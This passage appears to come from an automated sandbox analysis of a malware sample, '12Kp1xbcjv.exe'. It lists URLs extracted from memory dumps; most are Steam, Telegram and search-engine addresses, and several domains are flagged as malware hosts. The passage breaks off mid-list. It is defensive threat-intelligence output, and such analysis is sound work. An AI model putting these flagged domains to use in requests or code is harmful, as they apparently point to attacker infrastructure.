                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201612Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/recaptcha/12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://checkout.steampowered.com/12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://crosshairc.life/dAnjhw/12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://weaponrywo.digital/dJSuaj12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.enigmaprotector.com/12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000EF4000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://gemini.google.com/app?q=12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/;12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209294747.0000000003A45000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209490481.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A46000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209233998.0000000003A45000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1210405244.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344927950.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167247348.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209096840.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209294747.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A42000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/about/12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.cloudflare.steamstatic.com/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/my/wishlist/12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://cjlaspcorne.icu/DbIps12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://t.me/12Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/Zwg12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://pupmeholk.bet/12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236001508.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1237176889.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://htardwarehu.icu/Sbdsa12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://web.telegram.org12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamloopback.host12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://pupmeholk.bet/Ha12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209607996.0000000000871000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://help.steampowered.com/en/12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/market/12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/news/12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318654152.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294406463.00000000039BB000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.enigmaprotector.com/openU12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/Rw_12Kp1xbcjv.exe, 00000000.00000003.1237176889.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236001508.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://store.steampowered.com/subscriber_agreement/12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 